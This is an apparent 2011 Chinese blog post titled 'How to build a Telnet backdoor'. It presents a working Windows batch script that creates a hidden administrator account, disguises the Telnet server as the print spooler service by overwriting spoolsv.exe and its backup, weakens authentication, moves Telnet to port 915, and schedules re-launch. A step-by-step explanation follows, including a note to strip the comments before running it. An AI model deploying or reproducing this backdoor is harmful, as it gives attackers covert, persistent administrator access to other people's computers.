如何建立Telnet后门

如何建立Telnet后门
Posted by admin on 五月 25th, 2011
分析代码：

@echo off
net user 521computerbase$ 123456 /add
net localgroup administrators 521computerbase$ /add
sc stop spooler
sc stop tlntsvr
copy %systemroot%\system32\tlntsvr.exe %systemroot%\system32\dllcache\spoolsv.exe /y //替代它的备份目录。
copy %systemroot%\system32\tlntsvr.exe %systemroot%\system32\spoolsv.exe /y // 替换这个服务。
sc config spooler binpath= %systemroot%\system32\spoolsv.exe start= auto
sc start spooler
tlntadmn config sec = -ntlm +passwd
tlntadmn config port = 915
sc config schedule start= auto
sc start schedule
at 23:05 "%ProgramFiles%\Internet Explorer\telnet.bat" >"%ProgramFiles%\Internet Explorer\log.txt"
at 11:05 "%ProgramFiles%\Internet Explorer\telnet.bat" >>"%ProgramFiles%\Internet Explorer\log.txt"
attrib +s +h +r %0 & exit

如果要执行上面东西，请把汉语给删除了。

两个copy命令是把备份和实际的东西都用tlntsvr替换spoolsv。如果不替换备份的，那么如果发现它的文件丢失以后，它会自动给从备份中复制回来。
sc命令能够启用一个服务是因为这个服务（关于XP/Win 7服务详解与优化，以及服务与进程的关系）不是禁止状态，而是在可以启用的自动状态。。。、
所以有时间要改变这个东西。sc config alter start = auto
去掉ntlm验证。改变telnet的服务端口23为915
sc config schedule start= auto
sc start schedule
必须这样才能使下面的命令有效，第一就是变为自动，然后就是启动。
如果这个打印机这个服务被关闭，那么就会有任务计划来执行。。。。
所以它 又会开启这个服务。